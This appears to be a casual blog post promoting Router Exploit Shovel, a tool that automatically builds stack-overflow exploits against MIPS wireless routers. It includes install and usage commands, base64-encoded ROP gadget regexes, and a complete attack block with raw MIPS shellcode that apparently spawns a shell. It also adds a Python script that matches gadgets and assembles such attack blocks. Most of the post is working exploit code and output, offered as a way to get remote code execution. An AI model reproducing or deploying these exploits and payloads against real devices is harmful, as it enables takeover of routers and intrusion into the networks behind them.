Router Exploit Shovel - Automated Application Generation for Stack Overflow Types on Wireless Routers

Thanks for stopping by. This time I'll share some info with you,
and it's a good fit for those of you who work in networking :V
hehe, because here we have a tool that automatically generates applications for stack overflow types.
Okay, straight to the discussion.

This tool is called Router Exploit Shovel.
So what is Router Exploit Shovel?

Router Exploit Shovel is an automated application-generation tool for stack overflow
types on wireless routers.
The tool implements the main functions of an exploit:
it adapts to the length of the padding data on the stack,
generates the ROP chain, generates shellcode from the ones it ships with,
and finally assembles all of it into complete attack code (pretty cool, hehe).
The hacker only needs to attach that attack code at the overflow point of the PoC to
complete the remote code execution exploit.
But :( the tool only supports MIPSel and MIPSeb, and it runs on Ubuntu 16.04 64-bit.

Okay, straight to the installation steps; the most important part, what the tool does,
is explained above.

Install
If you haven't installed git, python3 and setuptools yet, install them first;
there are plenty of guides on Google, don't expect to be spoon-fed all the time :V


root@darkclownsec~:# git clone https://github.com/arthastang/Router-Exploit-Shovel.git


Once that's done, install its dependencies:


root@darkclownsec~:# cd Router-Exploit-Shovel/

root@darkclownsec~:# python3 setup.py install


How to use it


root@darkclownsec~:# python3 Router_Exploit_Shovel.py -h
Usage: Router_Exploit_Shovel.py [options]

Options:
  -h, --help            show this help message and exit
  -b BINARYFILEPATH, --binaryFile=BINARYFILEPATH
                        input binary file path
  --ba=BINARYBASEADDR, --binaryBaseAddr=BINARYBASEADDR
                        input binary base address,default=0x00400000
  -l LIBRARYFILEPATH, --libraryFile=LIBRARYFILEPATH
                        input libc file path
  --la=LIBRARYBASEADDR, --libraryBaseAddr=LIBRARYBASEADDR
                        input library base address,default=0x2aae2000
  -o OVERFLOWFUNCTIONPOINTOFFSET, --overflowPoint=OVERFLOWFUNCTIONPOINTOFFSET
                        input overflow function point offset
  --arch=ARCH           input architecture of elf files,[little] or
                        [big],default=big



Here's an example:

root@darkclownsec~:# python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584

Note that the ROP chain is built from absolute addresses: the result only works for this exact binary and libc build, loaded at the base addresses given with --ba and --la (the defaults are 0x00400000 and 0x2aae2000), so check those against the real target before using the block.

The directory structure looks like this:


--Router_Exploit_Shovel.py       #Startup script
--databases/
  |---ROP_patterns/              #YAML file of ROP patterns
  |---shellcodes/                #YAML file of shellcodes
--example/                       #Nday vulnerabilities, full report and exploit code
--results/
  |---ROP_gadgets/               #ROP gadgets generating results
  |---attackBlock.txt            #Attack block generating results
--ropper/                        #Modified ropper module to get all gadgets
--filebytes/                     #Filebytes module to load ELFs
--router_exp_shovel/             #Main module
  |---offset_calculator/         #Calculate padding size
  |---ROP_maker/                 #Make ROP chains
  |---shellcode_maker/           #Make shellcodes
--qemuTestEnvironment/           #MIPS run-environment for router exploitation

ROP chain generation
This tool uses patterns to generate ROP chains. The patterns are extracted from common ROP
exploitation procedures, and regex matching is used to find the available gadgets that fill
in the chain string; the patterns are stored base64-encoded so their regex escapes don't have
to be escaped a second time in the YAML file. For example:


chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44

gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==

#gadget1: (.*)move \\$t9\\, \\$s1; lw \\$ra\\, 0x24\\(\\$sp\\); lw \\$s1\\, 0x20\\(\\$sp\\); lw \\$s0\\, 0x1c\\(\\$sp\\);(.*); jr \\$t9; addiu \\$sp\\, \\$sp\\, 0x28;

gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7

#gadget2: (.*)addiu \\$a0\\, \\$zero\\, 1; move \\$t9\\, \\$s1; jalr \\$t9;

call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=

#call_code: (.*)move \\$t9\\, \\$s2; jalr \\$t9;

stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==

#stack_gadget: (.*)addiu \\$s2\\, \\$sp\\, 0x18;(.*)move \\$t9\\, \\$s0; jalr \\$t9;

Attack block
You can find the generated attack block in results/attackBlock.txt. It has the same layout as the chainString above: the A padding computed by offset_calculator, then the packed gadget addresses in place of each (name), and the shellcode after the run of \x22\x51\x44\x44. For example:


attackBlock = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x2a\xb3\x7c\x60\x2a\xb2\xbd\xfcBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x2a\xb3\x5c\xa0CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x2a\xb0\x09\x38DDDD\x2a\xaf\x76\x68\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99\x27\xb2\x05\x4b\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1\x02\x2a\x18\x26\xae\x43\xff\xc1\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\x7a\x69\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"
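The matching and filling described under "ROP chain generation", and the way the filled chain becomes the attack block above, as an added example in Python. This is not Router Exploit Shovel's own code and does not reproduce its YAML handling or its offset_calculator: it decodes the four base64 patterns exactly as they are printed on this page, runs them as regexes over a constructed ropper-style gadget listing, and renders the (name) placeholders of the chainString with big- or little-endian packed addresses. The gadget file offsets, the sleep() offset, the 0x80-byte padding, the 16-byte shellcode stand-in and the 32-entry filler sled are all invented for the example; the library base is the tool's default 0x2aae2000. It also does one check the page does not mention: it refuses any address that packs to a NUL byte, because a chain delivered through a string copy would be cut off there.

```python
# Added example; not code from Router Exploit Shovel. The gadget listing, offsets,
# padding size and shellcode stand-in below are constructed for illustration.
import base64
import re
import struct

# The four ROP patterns exactly as the page shows them (databases/ROP_patterns):
# base64 keeps the backslash-heavy regexes out of YAML's own escaping rules.
PATTERNS_B64 = {
    "gadget1": "KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==",
    "gadget2": "KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7",
    "call_code": "KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=",
    "stack_gadget": "KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==",
}

# The page's chainString up to the filler sled; the B/C/D runs are stack slots the
# gadgets step over. The \x22\x51\x44\x44 sled is appended in build_attack_block().
CHAIN_TEMPLATE = ("(gadget2)(gadget1)" + "B" * 32 + "(sleep)" + "C" * 32
                  + "(call_code)" + "DDDD" + "(stack_gadget)")

# Constructed ropper-style listing ("<file offset>: <instructions>"). The offsets are
# invented for this example; they are not real gadgets from libuClibc-0.9.30.so.
GADGET_LISTING = """\
0x0004a1b0: lw $t9, 0x1c($sp); jalr $t9; nop;
0x0004e5a0: addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
0x0004fa70: move $t9, $s1; lw $ra, 0x24($sp); lw $s1, 0x20($sp); lw $s0, 0x1c($sp); lw $gp, 0x10($sp); jr $t9; addiu $sp, $sp, 0x28;
0x00051234: move $t9, $s2; jalr $t9;
0x00053e40: addiu $s2, $sp, 0x18; lw $a0, 0x20($sp); move $t9, $s0; jalr $t9;
"""
LIB_BASE = 0x2AAE2000       # the tool's default --libraryBaseAddr
SLEEP_OFFSET = 0x0004BC20   # invented file offset of libc's sleep() for the example


def decode_patterns(b64_patterns):
    """Base64-decode every YAML pattern into a compiled regex."""
    return {name: re.compile(base64.b64decode(b64).decode())
            for name, b64 in b64_patterns.items()}


def parse_listing(text):
    """Turn 'offset: insns' lines into (int offset, insns) tuples."""
    gadgets = []
    for line in text.splitlines():
        offset, _, insns = line.partition(":")
        gadgets.append((int(offset, 16), insns.strip()))
    return gadgets


def find_gadgets(patterns, listing, base):
    """Map each pattern name to the absolute address of the first gadget matching it."""
    found = {}
    for name, regex in patterns.items():
        for offset, insns in listing:
            if regex.search(insns):
                found[name] = base + offset
                break
        else:
            raise LookupError(f"no gadget in the listing matches {name!r}")
    return found


def bad_bytes(raw, badchars=b"\x00"):
    """Bytes of `raw` that would break a string-copy overflow (NUL by default)."""
    return bytes(sorted(set(raw) & set(badchars)))


def pack_addr(addr, arch="big", badchars=b"\x00"):
    """Pack one 32-bit address in the ELF's byte order; refuse it if it contains bad bytes."""
    raw = struct.pack(">I" if arch == "big" else "<I", addr)
    bad = bad_bytes(raw, badchars)
    if bad:
        raise ValueError(f"address {addr:#010x} packs to bad bytes {bad!r}")
    return raw


def render_chain(template, addrs, arch="big"):
    """Replace every (name) placeholder in the chainString with that symbol's packed address."""
    out, pos = b"", 0
    for m in re.finditer(r"\((\w+)\)", template):
        out += template[pos:m.start()].encode() + pack_addr(addrs[m.group(1)], arch)
        pos = m.end()
    return out + template[pos:].encode()


def build_attack_block(padding_len, addrs, shellcode, arch="big", sled_count=32):
    """padding (offset_calculator's job) + ROP chain + NUL-free filler sled + shellcode."""
    sled = b"\x22\x51\x44\x44" * sled_count   # the filler word the page's chainString ends with
    return b"A" * padding_len + render_chain(CHAIN_TEMPLATE, addrs, arch) + sled + shellcode


def demo(arch="big"):
    """Full pipeline on the constructed inputs; returns the attack block bytes."""
    patterns = decode_patterns(PATTERNS_B64)
    addrs = find_gadgets(patterns, parse_listing(GADGET_LISTING), LIB_BASE)
    addrs["sleep"] = LIB_BASE + SLEEP_OFFSET
    # 0x80 bytes of padding and a 16-byte stand-in for shellcode_maker's output are invented.
    return build_attack_block(0x80, addrs, b"S" * 16, arch)


if __name__ == "__main__":
    block = demo()
    # Print in the same \x.. notation as results/attackBlock.txt.
    print("".join(chr(b) if 0x20 <= b <= 0x7e else "\\x%02x" % b for b in block))
```

Run it directly to print the block in the notation of results/attackBlock.txt; calling demo("little") is the equivalent of --arch little and only flips the byte order of every packed address, the gadget matching itself is unchanged.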

Okay, that's all, thanks, and I hope it's useful for those of you who work in networking :3
bye.
